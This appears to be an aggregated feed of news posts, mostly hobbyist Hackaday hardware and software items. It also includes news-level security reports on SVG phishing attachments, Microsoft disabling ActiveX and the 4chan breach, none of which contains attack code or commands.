Our telemetry data indicates a significant increase in SVG campaigns during March 2025. We found 2,825 of these emails in just the first quarter of the year.
Emails with SVG attachments, January through March 2025 (download)
In April, the upward trend continued: in the first half of the month, we detected 1324 emails with SVG attachments – more than two-thirds of March’s figure.
Takeaways
Phishers are relentlessly exploring new techniques to circumvent detection. They vary their tactics, sometimes employing user redirection and text obfuscation, and other times, experimenting with different attachment formats. The SVG format provides the capability to embed HTML and JavaScript code within images, which is misused by attackers. Despite not being widespread at the time of this study, SVG attachment attacks are showing a clear upward trend. These attacks, while currently relatively basic – much like HTML attachment scenarios – involve SVG files containing either a phishing link page or a redirection script to a fraudulent site. However, the use of SVG as a container for malicious content can also be employed in more sophisticated targeted attacks.
securelist.com/svg-phishing/11…
Printed Perpetual Calendar Clock Contains Clever Cams
At Hackaday, it is always clock time, and clock time is a great time to check in with [shiura], whose 3D Printed Perpetual Calendar Clock is now at Version 2. A 3D printed calendar clock, well, no big deal, right? Grab a few steppers, slap in an ESP32 to connect to a time server, and you’re good. That’s where most of us would probably go, but most of us aren’t [shiura], who has some real mechanical chops.
This clock isn’t all mechanical. It probably could be, but at its core it uses a commercial quartz movement — you know, the cheap ones that take a single double-A battery. The only restriction is that the length of the hour axis must be twelve millimeters or more. Aside from that, a few self-tapping screws and an M8 nut, everything else is fully 3D printed.
From that simple quartz movement, [shiura]’s clock tracks not only the day of the week, the month and date — even in Febuary, and even compensating for leap years. Except for the inevitable drift (and battery changes) you should not have to adjust this clock until March 2100, assuming both you and the 3D printed mechanism live that long. Version one actually did all this, too, but somehow we missed it; version two has some improvements to aesthetics and usability. Take a tour of the mechanism in the video after the break.
We’ve featured several of [shiura]’s innovative clocks before, from a hybrid mechanical-analog display, to a splitless flip-clock, and a fully analog hollow face clock. Of course [shiura] is hardly our only clock-making contributor, because it it always clock time at Hackaday.
youtube.com/embed/H03xxuqXKgE?…
Preventing Galvanic Corrosion in Water Cooling Loops
Water is an excellent coolant, but the flip side is that it is also an excellent solvent. This, in short, is why any water cooling loop is also a prime candidate for an interesting introduction to the galvanic metal series, resulting in severe corrosion that commences immediately. In a recent video by [der8aer], this issue is demonstrated using a GPU cold plate. The part is made out of nickel-plated copper and features many small channels to increase surface area with the coolant.
Theoretically, if one were to use distilled water in a coolant loop that contains a single type of metal (like copper), there would be no issue. As [der8auer] points out, fittings, radiators, and the cooling block are nearly always made of various metals and alloys like brass, for example. This thus creates the setup for galvanic corrosion, whereby one metal acts as the anode and the other as a cathode. While this is desirable in batteries, for a cooling loop, this means that the water strips metal ions off the anode and deposits them on the cathode metal.
The nickel-plated cold plate should be immune to this if the plating were perfect. However, as demonstrated in the video, even a brief exposure to distilled water at 60°C induced strong galvanic corrosion. Analysis in an SEM showed that the imperfect nickel plating allowed copper ions to be dissolved into the water before being deposited on top of the nickel (cathode). In a comparison with another sample that had a coolant with corrosion inhibitor (DP Ultra) used, no such corrosion was observed, even after much longer exposure.
This DP Ultra coolant is mostly distilled water but has glycol added. The glycol improves the pH and coats surfaces to prevent galvanic corrosion. The other element is benzotriazole, which provides similar benefits. Of course, each corrosion inhibitor targets a specific environment, and there is also the issue with organic films forming, which may require biocides to be added. As usual, water cooling has more subtlety than you’d expect.
youtube.com/embed/7pIpKetQlZs?…
China Hosts Robot Marathon
China played host to what, presumably, was the world’s first robot and human half-marathon. You can check out the action and the Tiangong Ultra robot that won in the video below. The event took place in Beijing and spanned 21.1 km. There was, however, a barrier between lanes for humans and machines.
The human rules were the same as you’d expect, but the robots did need a few concessions, such as battery swap stops. The winning ‘bot crossed the finish line in just over 160 minutes. However, there were awards for endurance, gait design, and design innovation.
Humans still took the top spots, though. We also noted that some of the robots had issues where they lost control or had other problems. Even the winner fell down once and had three battery changes over the course.
Of the 21 robots that started, only six made the finish line. We don’t know how many of the 12,000 humans finished, but we are pretty sure it was more than six, so we don’t think runners have to worry about robot overlords yet. But they’re getting better all the time.
youtube.com/embed/BYmCxYTbg50?…
Hackaday Links: April 20, 2025
We appear to be edging ever closer to a solid statement of “We are not alone” in the universe with this week’s announcement of the detection of biosignatures in the atmosphere of exoplanet K2-18b. The planet, which is 124 light-years away, has been the focus of much attention since it was discovered in 2015 using the Kepler space telescope because it lies in the habitable zone around its red-dwarf star. Initial observations with Hubble indicated the presence of water vapor, and follow-up investigations using the James Webb Space Telescope detected all sorts of goodies in the atmosphere, including carbon dioxide and methane. But more recently, JWST saw signs of dimethyl sulfide (DMS) and dimethyl disulfide (DMDS), organic molecules which, on Earth, are strongly associated with biological processes in marine bacteria and phytoplankton.
The team analyzing the JWST data says that the data is currently pretty good, with a statistical significance of 99.7%. That’s a three-sigma result, and while it’s promising, it’s not quite good enough to seal the deal that life evolved more than once in the universe. If further JWST observations manage to firm that up to five sigma, it’ll be the most important scientific result of all time. To our way of thinking, it would be much more significant than finding evidence of ancient or even current life in our solar system, since cross-contamination is so easy in the relatively cozy confines of the Sun’s gravity well. K2-18b is far enough away from our system as to make that virtually impossible, and that would say a lot about the universality of biochemical evolution. It could also provide an answer to the Fermi Paradox, since it could indicate that the galaxy is actually teeming with life but under conditions that make it difficult to evolve into species capable of making detectable techno-signatures. It’s hard to build a radio or a rocket when you live on a high-g water world, after all.
Closer to home, there’s speculation that the famous Antikythera mechanism may not have worked at all in its heyday. According to researchers from Universidad Nacional de Mar del Plata in Argentina, “the world’s first analog computer” could not have worked due to the accumulated mechanical error of its gears. They blame this on the shape of the gear teeth, which appear triangular on CT scans of the mechanism, and which they seem to attribute to manufacturing defects. Given the 20-odd centuries the brass-and-iron device spent at the bottom of the Aegean Sea and the potential for artifacts in CT scans, we’re not sure it’s safe to pin the suboptimal shape of the gear teeth on the maker of the mechanism. They also seem to call into question the ability of 1st-century BCE craftsmen to construct a mechanism with sufficient precision to serve as a useful astronomical calculator, a position that Chris from Clickspring has been putting the lie to with his ongoing effort to reproduce the Antikythera mechanism using ancient tools and materials. We’re keen to hear what he has to say about this issue.
Speaking of questionable scientific papers, have you heard about “vegetative electron microscopy”? It’s all the rage, having been mentioned in at least 22 scientific papers recently, even though no such technique exists. Or rather, it didn’t exist until around 2017, when it popped up in a couple of Iranian scientific papers. How it came into being is a bit of a mystery, but it may have started with faulty scans of a paper from the 1950s, which had the terms “vegetative” and “electron microscopy” printed in different columns but directly across from each other. That somehow led to the terms getting glued together, possibly in one of those Iranian papers because the Farsi spelling of “vegetative” is very similar to “scanning,” a much more sensible prefix to “electron microscopy.” Once the nonsense term was created, it propagated into subsequent papers of dubious scientific provenance by authors who didn’t bother to check their references, or perhaps never existed in the first place. The wonders of our AI world never cease to amaze.
And finally, from the heart of Silicon Valley comes a tale of cyber hijinks as several crosswalks were hacked to taunt everyone’s favorite billionaires. Twelve Palo Alto crosswalks were targeted by persons unknown, who somehow managed to gain access to the voice announcement system in the crosswalks and replaced the normally helpful voice messages with deep-fake audio of Elon Musk and Mark Zuckerberg saying ridiculous but plausible things. Redwood City and Menlo Park crosswalks may have also been attacked, and soulless city officials responded by disabling the voice feature. We get why they had to do it, but as cyberattacks go, this one seems pretty harmless.
youtube.com/embed/Uy1oNvsUQ0o?…
milliForth-6502, a Forth for the 6502 CPU
Forth is popular on small computers because it is simple to implement, yet quite powerful. But what happens when you really need to shrink it? Well, if your target is the 6502, there’s milliForth-6502.
This is a port of milliForth, which is a fork of sectorforth. The sectorforth project set the standard, implementing a Forth so small it could fit in a 512-byte boot sector. The milliForth project took sectorforth and made it even smaller, weighing in at only 336 bytes. However, both milliForth and sectorforth are for the x86 architecture. With milliForth-6502, [Alvaro G. S. Barcellos] wanted to see how small he could make a 6502 implementation.
So how big is the milliForth-6502 binary? Our tests indicate: 1,110 bytes. It won’t quite fit in a boot sector, but it’s pretty small!
Most of the code for milliForth-6502 is assembly code in sector-6502.s. This code is compiled using tools from the cc65 project. To run the code lib6502 is used for 6502 emulation.
Emulation is all well and good as far as it goes, especially for development and testing, but we’d love to see this code running on a real 6502. Even better would be a 6502 built from scratch! If you get this code running we’d love to hear how it went!
youtube.com/embed/6P4tEYLEhU8?…
The Most Printable 3D Printer Yet
Despite the best efforts of the RepRap community over the last twenty years, self-replicating 3D printers have remained a stubbornly elusive goal, largely due to the difficulty of printing electronics. [Brian Minnick]’s fully-printed 3D printer could eventually change that, and he’s already solved an impressive number of technical challenges in the process.
[Brian]’s first step was to make a 3D-printable motor. Instead of the more conventional stepper motors, he designed a fully 3D-printed 3-pole brushed motor. The motor coils are made from solder paste, which the printer applies using a custom syringe-based extruder. The paste is then sintered at a moderate temperature, resulting in traces with a resistivity as low as 0.001 Ω mm, low enough to make effective magnetic coils.
Brushed motors are less accurate than stepper motors, but they do have a particularly useful advantage here: their speed can be controlled simply by varying the voltage. This enables a purely electromechanical control system – no microcontroller on this printer! A 3D-printed data strip encodes instructions for the printer as holes in a plastic sheet, which open and close simple switches in the motor controller. These switches control the speed, direction, and duration of the motors’ movement, letting the data strip encode motion vectors.
Remarkably, the hotend on this printer is also 3D-printed. [Brian] took advantage of the fact that PEEK’s melting point increases by about 110 ℃ when it’s annealed, which should allow an annealed hotend to print itself. So far it’s only extruded PLA, but the idea seems sound.
The video below the break shows a single-axis proof of concept in action. We haven’t been able to find any documentation of a fully-functional 3D printer, but nevertheless, it’s an impressive demonstration. We’ve covered similar printers before, and if you make progress in this area, be sure to send us a tip.
youtube.com/embed/xiygZo0YxBw?…
Low Cost Oscilloscope Gets Low Cost Upgrades
Entry-level oscilloscopes are a great way to get some low-cost instrumentation on a test bench, whether it’s for a garage lab or a schoolroom. But the cheapest ones are often cheap for a reason, and even though they work well for the price they won’t stand up to more advanced equipment. But missing features don’t have to stay missing forever, as it’s possible to augment them to get some of these features. [Tommy’s] project shows you one way to make a silk purse from a sow’s ear, at least as it relates to oscilloscopes.
Most of the problem with these lower-cost tools is their low precision due to fewer bits of analog-digital conversion. They also tend to be quite noisy, further lowering the quality of the oscilloscope. [Tommy] is focusing his efforts on the DSO138-mini, an oscilloscope with a bandwidth of 100 kHz and an effective resolution of 10 bits. The first step is to add an anti-aliasing filter to the input, which is essentially a low-pass filter that removes high frequency components of the signal, which could cause a problem due to the lower resolution of the device. After that, digital post-processing is done on the output, which removes noise caused by the system’s power supply, among other things, and essentially acts as a second low-pass filter.
In part 2 of the project, [Tommy] demonstrates the effectiveness of these two methods with experimental data, showing that a good percentage of the noise on a test signal has been removed from the output. All the more impressive here is that the only additional cost besides the inexpensive oscilloscope itself is for a ceramic capacitor that costs around a dollar. We were also impressed: [Tommy] is a junior in high school!
Presumably, you could apply these techniques to other inexpensive equipment, like this even cheaper oscilloscope based on the ESP32.
Building a Custom Zynq-7000 SoC Development Board from the Ground Up
In this series of 23 YouTube videos [Rich] puts the AMD Zynq-7000 SoC through its paces by building a development board from the ground up to host it along with its peripherals. The Zynq is part FPGA and part CPU, and while it has been around for a while, we don’t see nearly as many projects about it as we’d like.
Rich covers everything from the power system to HDMI, USB, DDR RAM, and everything in between. By the end, he’s able to boot PetaLinux.
The Zynq SoC includes an ARM Cortex-A9 Based APU and an Artix-7 FPGA (or a Kintex-7 FPGA on higher models). In case you missed it, Xilinx was recently acquired by AMD, which is why you might have remembered this as a Xilinx part.
We’ve heard from [Rich] before. Back in 2021 we saw his Arduino Brings USB Mouse To Homebrew Computer. Don’t miss his follow-up playlist: Building on my Zynq-7000 in which he takes his Zynq-7000 board even further.
If you’re interested in FPGA technology but need something more easy going to get you started, be sure to check out how to build a 6809 CPU on an FPGA. Or, if you need something even simpler, report for boot camp.
youtube.com/embed/jbG5KUbGaGE?…
Thanks to [Alex] for the tip!
Non-planar Slicing is for the Birds
![Benchy, printed upside down on [Josh's] Core R-Theta printer.](https://poliverso.org/photo/link/299056 "Benchy, printed upside down on [Josh's] Core R-Theta printer.")
When we say non-planar slicing is for the birds, we mean [Joshua Bird], who demonstrates the versatility of his new non-planar S4-Slicer by printing a Benchy upside down with the “Core R-Theta” printer we have featured here before.
This non-planar slicer is built into a Jupyter notebook, which follows a relatively simple algorithm to automatically generate non-planar toolpaths for any model. It does this by first generating a tetrahedral mesh of the model and then calculating the shortest possible path through the model from any given tetrahedron to the print bed. Even with non-planar printing, you need to print from the print-bed up (or out).
Quite a lot of math is done to use these paths to calculate a deformation mesh, and we’ll leave that to [Joshua] to explain in his video below. After applying the deformation, he slices the resulting mesh in Cura, before the G-code goes back to Jupyter to be re-transformed, restoring the shape of the original mesh.
So yes, it is G-code bending as others have demonstrated before, but in a reproducible, streamlined, and straightforward workflow. Indeed, [Josh] credits much of the work to earlier work on the S^3-Slicer, which inspired much of the logic and the name behind his S4 slicer. (Not S4 as in “more than S^3” but S4 as a contraction of “Simplified S^3”). Once again, open source allows for incremental innovation.
It is admittedly a computationally intensive process, and [Joshua] uses a simplified model of Benchy for this demo. This seems exactly the sort of thing we’d like to burn compute power on, though.
This sort of non-planar 3D printing is an exciting frontier, one which we have covered before. We’ve seen techniques for non-planar infill, or even to print overhangs on unmodified Cartesian printers, but this is probably the first time we’ve seen Benchy given the non-planar treatment. You can try S4 slicer for yourself via GitHub, or just watch the non-planar magic in action after the break.
youtube.com/embed/M51bMMVWbC8?…
Rockbox 4.0 Released
It’s traditional to launch new software on April Fool’s Day, which is when we heard that Rockbox 4.0 has been released. But, in this case, the venerable MP3 firmware actually did update after a long absence. It’s great to see that good old Rockbox is still kicking along. We first mentioned Rockbox here at Hackaday approaching 20 years ago. How time flies. There used to be a whole ‘scene’ around hacking Personal Media Players (PMPs), also known as “MP3 Players”.
We tracked down Rockbox contributor [Solomon Peachy] to ask for some simple advice: If someone wants to install Rockbox on a personal media player today, what hardware should they buy? [Solomon] referred us to the AIGO EROS Q / EROS K, which is the only compatible hardware still being manufactured and sold. Beyond that, if you want to buy compatible hardware, you’ll need to find some secondhand somewhere, such as eBay. See the Rockbox Wiki for supported hardware.
Smartphones and streaming services have subsumed the single-purpose personal media player. Will you put the new Rockbox on something? Let us know in the comments.
youtube.com/embed/zooD_rVjzm4?…
Frankenflair 58: Manual Roots, Advanced Brew
The user interface of things we deal with often makes or breaks our enjoyment of using a device. [Janne] from Fraktal thinks so, he has an espresso machine he enjoys but the default controls were not what he was looking for and so in true hacker fashion he took what was and made it his own.
This Kickstarter-born Flair 58 is a manual espresso machine with minimal moving parts and no electronics in its default configuration. An optional preheater was available, but it felt like an afterthought. He decided to add a bit more finesse into his solution, with a sleek touchscreen display controlling a custom heater board with closed-loop temperature control, and provisions to connect an external scale scale for precise pour measurements. We’ve seen coffee maker hacks before, but this one certainly stands out for adding features absent from the machine’s initial design.
To accommodate the two custom PCBs and the touchscreen, [Janne] modified the machine’s frame. The Flair 58’s swooping curves posed a challenge, but instead of using an external enclosure, he shaped the PCBs to fit seamlessly within the machine’s structure. A wonderfully done hack given the open, exposed design of the base hardware.
Certainly head over to his site and check out this beautiful solution to improving on an existing device, and check out his other cool project based around laser fault injection. All the hardware and software for this project is freely available over on his site so if you’d like to upgrade your machine be sure to go check it out.
China’s TMSR-LF1 Molten Salt Thorium Reactor Begins Live Refueling Operations
Although uranium-235 is the typical fuel for commercial fission reactors on account of it being fissile, it’s relatively rare relative to the fertile U-238 and thorium (Th-232). Using either of these fertile isotopes to breed new fuel from is thus an attractive proposition. Despite this, only India and China have a strong focus on using Th-232 for reactors, the former using breeders (Th-232 to U-233) to create fertile uranium fuel. China has demonstrated its approach — including refueling a live reactor — using a fourth-generation molten salt reactor.
The original research comes from US scientists in the 1960s. While there were tests in the MSRE reactor, no follow-up studies were funded. The concept languished until recently, with Terrestrial Energy’s Integral MSR and construction on China’s 2 MW TMSR-LF1 experimental reactor commencing in 2018 before first criticality in 2023. One major advantage of an MSR with liquid fuel (the -LF part in the name) is that it can filter out contaminants and add fresh fuel while the reactor is running. With this successful demonstration, along with the breeding of uranium fuel from thorium last year, a larger, 10 MW design can now be tested.
Since TMSR doesn’t need cooling water, it is perfect for use in arid areas. In addition, China is working on using a TMSR-derived design in nuclear-powered container vessels. With enough thorium around for tens of thousands of years, these low-maintenance MSR designs could soon power much of modern society, along with high-temperature pebble bed reactors, which is another concept that China has recently managed to make work with the HTR-PM design.
Meanwhile, reactors are getting smaller in general.
Addio ActiveX! Microsoft stacca la spina al dinosauro dei malware
Microsoft ha affermato che inizierà a disabilitare i controlli ActiveX nelle versioni Windows delle app Microsoft 365 e Office 2024 entro la fine del mese. ActiveX risale al 1996 ed è un framework legacy che consente agli sviluppatori di creare oggetti interattivi che possono essere incorporati nei documenti di Office.
Una volta implementate le modifiche, si prevede che ActiveX verrà completamente bloccato in Word, Excel, PowerPoint e Visio senza alcuna notifica. Ciò dovrebbe ridurre i rischi di infezione da malware e di esecuzione di codice non autorizzato.
Quando si aprono documenti con controlli ActiveX, nella parte superiore della finestra verrà visualizzata una notifica che informa che il contenuto ActiveX nel file è stato bloccato, insieme al pulsante “Ulteriori informazioni”.
Inoltre, in un bollettino separato , Microsoft ha avvisato gli utenti di Office di non aprire allegati sconosciuti o di non modificare le impostazioni ActiveX quando ricevono finestre pop-up o richieste da persone sconosciute. “Quando ActiveX è disabilitato, non è più possibile creare o interagire con oggetti ActiveX nei file di Microsoft 365. Alcuni oggetti ActiveX esistenti continueranno a essere visualizzati come immagini statiche, ma non sarà possibile interagire con essi“, afferma Microsoft.
L’abilitazione dei controlli ActiveX sarà disponibile tramite il Centro protezione e ActiveX sarà abilitato in tutte le applicazioni di Office, tra cui Word, PowerPoint, Excel e Visio. Allo stesso tempo, Microsoft insiste sul fatto che “per una sicurezza ottimale, consigliamo vivamente di disattivare i controlli ActiveX a meno che non sia assolutamente necessario”.
La decisione di disattivare ActiveX per impostazione predefinita è probabilmente motivata da noti problemi di sicurezza, tra cui vulnerabilità zero-day sfruttate da gruppi di hacker per distribuire malware. Ad esempio, i criminali sfruttano i controlli ActiveX incorporati nei documenti Word per compromettere le reti aziendali e mettere radici, distribuendo il malware TrickBot e i beacon Cobalt Strike.
In passato Microsoft ha disattivato diverse funzionalità di Windows e Office utilizzate dagli aggressori per attaccare gli utenti. Tutto è iniziato nel 2018, quando Microsoft ha ampliato il supporto per l’interfaccia AMSI (Antimalware Scan Interface) nelle applicazioni client di Office 365 per prevenire gli attacchi alle macro VBA.
Da allora, l’azienda ha iniziato a bloccare le macro VBA per impostazione predefinita, ha implementato la protezione per le macro XLM, ha disabilitato le macro di Excel 4.0 (XLM) e ha iniziato a bloccare i componenti aggiuntivi XLL non attendibili per impostazione predefinita in tutti gli ambienti Microsoft 365.
Nel maggio 2024, Microsoft ha annunciato che avrebbe eliminato gradualmente e definitivamente VBScript, trasformandolo in una funzionalità su richiesta e poi rimuovendolo del tutto.
L'articolo Addio ActiveX! Microsoft stacca la spina al dinosauro dei malware proviene da il blog della sicurezza informatica.
They Hacked a Nuclear Power Plant! Whoops! Don’t Make a Sound!
What do you do with an unused nuclear reactor project? In Washington, one of them was hacked to remove sound, all in the name of science.
In 1977, a little way outside of Seattle, Washington Nuclear Projects 3 and 5 (WNP-3 and WNP-5) were started as part of Washington Public Power Supply System (WPPSS, pronounced “whoops”). They ran over budget, and in the 80s they were mothballed even though WNP-3 was nearly complete.
In 2010 when [Ron] and [Bonnie Sauro] were starting their new acoustical lab, NWAA Labs, they thought they wanted to build in a mountain, but what they found was an auxiliary reactor building. The structure was attached to a defunct nuclear power facility. With concrete and rebar walls five feet thick, it was the ideal site for their acoustical experiments and tests.
There are strict facility requirements from standards bodies such as American National Standards Institute (ANSI) and the International Organization for Standardization (ISO) for acoustical labs which help ensure that different labs achieve comparable results. For example, you need stable temperature, humidity, and reverberation. The temperature within the facility is a stable 54 degrees Fahrenheit (12 degrees Celsius) regardless of the temperature outside.
Companies use acoustical labs to inform their designs and ensure that they meet acoustic standards or requirements, particularly those related to noise emissions. Over the last fifteen years, NWAA Labs has tested carpet samples, noise-cancelling headphones, sound-dampening construction materials, noisy washing machines, and even an airplane’s crew cabin!
If there was any question about whether [Ron Sauro] qualifies as a hacker, this quote removes all doubt: “I’m a carpenter, a plumber, a welder, I can fix a car,” he says. “Anything that needs to be done, I can do. Because I have to.”
Maybe we should send a wearable cone of silence to [Ron] for a complete test. If you’ve ever hacked a nuclear power plant, do let us know in the comments!
youtube.com/embed/JoYHPIDRVKw?…
Hydroplaning RC Jet boat Steers Clear of Convention
[CoraConcepts], who has a background in motorsports, has been busy designing an unconventional radio-controlled watercraft she calls the HydraJet.
There are two key design decisions that make the HydraJet what it is. First, she chose to propel the boat by pushing against the air via an electric ducted fan (EDF) rather than the water via a traditional water propeller. This simplified construction and made it more affordable, partly because she already had the fan on hand.
Her other design choice was to use wings underneath the boat to lift it out of the water. Not as hydrofoils, where the wings ride below the surface of the water, but for hydroplaning where the wings ride on the surface of the water. Lifting the vehicle out of the water, of course, reduces drag, improving performance as we’ve often seen with high speed watercraft (including RC models) as well as slower bicycle-powered ones. The choice to rely on hydroplaning also reduces the complexity of the design. Certain hydrofoil designs need to make adjustments in order to keep the vehicle at a steady level, whereas a hydroplaning wings can use a static angle. Hydrofoils also must overcome challenges to maintain stability.
[CoraConcepts] hopes to eventually scale the HydraJet up large enough to carry human passengers and we’re looking forward to the opportunity to take it for a spin around the lake.
youtube.com/embed/meIueNv_TBg?…
Thanks to [John Little] for the tip!
Vibing, AI Style
This week, the hackerverse was full of “vibe coding”. If you’re not caught up on your AI buzzwords, this is the catchy name coined by [Andrej Karpathy] that refers to basically just YOLOing it with AI coding assistants. It’s the AI-fueled version of typing in what you want to StackOverflow and picking the top answers. Only, with the current state of LLMs, it’ll probably work after a while of iterating back and forth with the machine.
It’s a tempting vision, and it probably works for a lot of simple applications, in popular languages, or generally where the ground is already well trodden. And where the stakes are low, as [Al Williams] pointed out while we were talking about vibing on the podcast. Can you imagine vibe-coded ATM software that probably gives you the right amount of money? Vibe-coding automotive ECU software?
While vibe coding seems very liberating and hands-off, it really just changes the burden of doing the coding yourself into making sure that the LLM is giving you what you want, and when it doesn’t, refining your prompts until it does. It’s more like editing and auditing code than authoring it. And while we have no doubt that a stellar programmer like [Karpathy] can verify that he’s getting what he wants, write the correct unit tests, and so on, we’re not sure it’s the panacea that is being proclaimed for folks who don’t already know how to code.
Vibe coding should probably be reserved for people who already are expert coders, and for trivial projects. Just the way you wouldn’t let grade-school kids use calculators until they’ve mastered the basics of math by themselves, you shouldn’t let junior programmers vibe code: It simultaneously demands too much knowledge to corral the LLM, while side-stepping any of the learning that would come from doing it yourself.
And then there’s the security side of vibe coding, which opens up a whole attack surface. If the LLM isn’t up to industry standards on simple things like input sanitization, your vibed code probably shouldn’t be anywhere near the Internet.
So should you be vibing? Sure! If you feel competent overseeing what [Dan] described as “the worst summer intern ever”, and the states are low, then it’s absolutely a fun way to kick the tires and see what the tools are capable of. Just go into it all with reasonable expectations.
This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter. Want this type of article to hit your inbox every Friday morning? You should sign up!
Will it Run Llama 2? Now DOS Can
Will a 486 run Crysis? No, of course not. Will it run a large language model (LLM)? Given the huge buildout of compute power to do just that, many people would scoff at the very notion. But [Yeo Kheng Meng] is not many people.
He has set up various DOS computers to run a stripped down version of the Llama 2 LLM, originally from Meta. More specifically, [Yeo Kheng Meng] is implementing [Andreq Karpathy]’s Llama2.c library, which we have seen here before, running on Windows 98.
The models are not large, of course, with TinyStories-trained 260 kB model churning out a blistering 2.08 tokens per second on a generic 486 box. Newer machines can run larger models faster, of course. Ironically a Pentium M Thinkpad T24 (was that really 21 years ago?) is able to run a larger 110 Mb model faster than [Yeo Kheng Meng]’s modern Ryzen 5 desktop. Not because the Pentium M is going blazing fast, mind you, but because a memory allocation error prevented that model from running on the modern CPU. Slow and steady finishes the race, it seems.
This port will run on any 32-bit i386 hardware, which leaves the 16-bit regime as the next challenge. If one of you can get an Llama 2 hosted locally on an 286 or a 68000-based machine, then we may have to stop asking “Does it run DOOM?” and start asking “Will it run an LLM?”
youtube.com/embed/4241obgG_QI?…
Open Source DMR Radio
While ham radio operators have been embracing digital mobile radio (DMR), the equipment is most often bought since — at least in early incarnations — it needs a proprietary CODEC to convert speech to digital and vice versa. But [QRadioLink] decided to tackle a homebrew and open source DMR modem.
The setup uses a LimeSDR, GNU Radio, and Codec2. There are some other open DMR projects, such as OpenRTX. So we are hopeful there are going to be more choices. The DMR modem, however, is only a proof-of-concept and reuses the MMDVMHost code to do the data link layer.
[QRadioLink] found several receiver implementations available, but only one other DMR transmitter — actually, a transceiver. Rather than use an AMBE hardware device or the potentially encumbered mbelib codec, the project uses Codec2 which is entirely open source.
There’s a lot of explanation about the data collection to prepare for the project, and then a deep dive into the nuts and bolts of the implementation. You might enjoy the video below to see things in action.
If you just want to listen to DMR, it’s easy. If Codec2 sounds familiar, it is part of M17.
youtube.com/embed/h4YrMieKY3Y?…
Attacco Hacker a 4chan! Dove è nato Anonymous, probabilmente chiuderà per sempre
L’imageboard di 4chan è praticamente inattivo da lunedì sera (14 aprile), apparentemente a causa di un attacco hacker. I membri dell’imageboard Soyjak party (noto anche semplicemente come The Party) sostengono di essere gli artefici dell’attacco hacker.
L’attacco a 4chan
Per dimostrare la loro tesi, i membri del Party hanno pubblicato screenshot dei pannelli di amministrazione, di un forum /qa/ ripristinato e di uno scomparso, modelli per bannare gli utenti e un elenco di indirizzi email che si ritiene appartengano agli amministratori, ai moderatori e ai “custodi” (mod meno privilegiati che aiutano a mantenere puliti i forum) di 4chan.
“Stasera è stata una serata speciale per molti di noi del soyjak party. Oggi, 14 aprile 2025, un hacker che era nel sistema 4chan da oltre un anno ha eseguito un’operazione soyclipse, ha riaperto /qa/, ha esposto informazioni personali dei dipendenti di [em]4chan e ha fatto trapelare codice dal sito”, [/em]riferisce Chud, membro del Party. “Nel tentativo di affrontare le conseguenze, gli amministratori di [em]4chan hanno chiuso tutti i server, ma ci sono segnalazioni non confermate che i server siano già completamente compromessi e non saranno in grado di funzionare per un po’ di tempo.”[/em]
Nello stesso thread, Chud ha condiviso diversi screenshot che mostrano come un hacker abbia avuto accesso ai pannelli amministrativi e agli strumenti dello staff di 4chan.
Grazie a questi strumenti è stato possibile scoprire la posizione e l’indirizzo IP di qualsiasi utente, ricostruire o riavviare tutte le bacheche di 4chan, accedere ai registri, visualizzare le statistiche del sito e gestire il database utilizzando phpMyAdmin.
Gli hacker non hanno rivelato come esattamente è stato ottenuto con l’accesso ai sistemi di 4chan. Si ritiene che la risorsa possa essere stata hackerata perché utilizzava una versione obsoleta di PHP risalente al 2016 e vulnerabile a diversi problemi.
Attualmente, 4chan a volte si carica in modalità testo, ma il più delle volte non funziona affatto e mostra errori di timeout di Cloudflare.
Ricordiamo 4chan e perché fu così influente
4chan è nato nel 2003 come un semplice imageboard dedicato principalmente agli appassionati di anime e cultura giapponese, creato da un giovane americano conosciuto online come “moot” (Christopher Poole). In breve tempo, però, il sito si è trasformato in qualcosa di molto più grande: una fucina caotica di meme, ironia dissacrante, contenuti NSFW e iniziative virali. Il forum, completamente anonimo, permetteva a chiunque di postare senza registrazione, contribuendo alla nascita di una sottocultura libera, imprevedibile e a volte profondamente disturbante, che avrebbe plasmato per anni l’estetica e la narrazione di Internet.
Tra i vari board, il più famoso (e famigerato) era /b/, una sezione dedicata al “random” dove ogni regola veniva costantemente infranta. Fu proprio lì che nacque Anonymous, il collettivo senza volto né leader, formato da utenti stanchi della censura, della manipolazione e del potere centralizzato. Il nome “Anonymous” derivava infatti dal fatto che ogni post di chi non era registrato appariva con quella firma. Da quella base, un numero crescente di utenti cominciò a pensare e agire come una mente collettiva, lanciando campagne, scherzi e – soprattutto – operazioni che avrebbero avuto un impatto globale.
Una delle prime operazioni storiche fu “Project Chanology” nel 2008, una protesta su scala mondiale contro la Chiesa di Scientology, accusata di censura dopo aver cercato di rimuovere un video imbarazzante di Tom Cruise da Internet. Anonymous rispose con attacchi DDoS, prank telefonici, sit-in davanti alle sedi della chiesa e video-manifesti divenuti iconici. L’operazione segnò il passaggio da semplici trollate online ad azioni coordinate e ideologicamente cariche, spesso legate alla difesa della libertà di espressione e alla lotta contro le istituzioni percepite come oppressive.
Negli anni successivi seguirono numerose operazioni, tra cui “Operation Payback” contro le aziende che avevano boicottato WikiLeaks, e campagne a supporto della Primavera Araba. Anche se oggi 4chan ha perso molto del suo peso culturale originario, non si può negare che abbia lasciato un’impronta profonda e indelebile nella storia di Internet.
È stato il crocevia tra anonimato, attivismo e creatività virale, dando vita a un movimento che ancora oggi riecheggia in molte forme dell’hacktivismo moderno.
L'articolo Attacco Hacker a 4chan! Dove è nato Anonymous, probabilmente chiuderà per sempre proviene da il blog della sicurezza informatica.
Restoring an Abandoned Game Boy Kiosk
Back in the olden days, there existed physical game stores, which in addition to physical games would also have kiosks where you could try out the current game consoles and handhelds. Generally these kiosks held the console, a display and any controllers if needed. After a while these kiosks would get scrapped, with only a very few ending up being rescued and restored. One of the lucky ones is a Game Boy kiosk, which [The Retro Future] managed to snag after it was found in a construction site. Sadly the thing was in a very rough condition, with the particle board especially being mostly destroyed.
These Game Boy kiosks also featured a special Game Boy, which – despite being super rare – also was hunted down. This led to the restoration, which included recovering as much of the original particle board as possible, with a professional furniture restore ([Don]) lending his expertise. This provides a master class in how to patch up damaged particle board, as maligned as this wood-dust-and-glue material is.
The boards were then reassembled more securely than the wood screws used by the person who had found the destroyed kiosk, in a way that allows for easy disassembly if needed. Fortunately most of the plastic pieces were still intact, and the Game Boy grey paint was easily matched. Next was reproducing a missing piece of art work, with fortunately existing versions available as reference. For a few missing metal bits that held the special Game Boy in place another kiosk was used to provide measurements.
After all this, the kiosk was powered back on, and it was like 1990 was back once again, just in time for playing Tetris on a dim, green-and-black screen while hunched half into the kiosk at the game store.
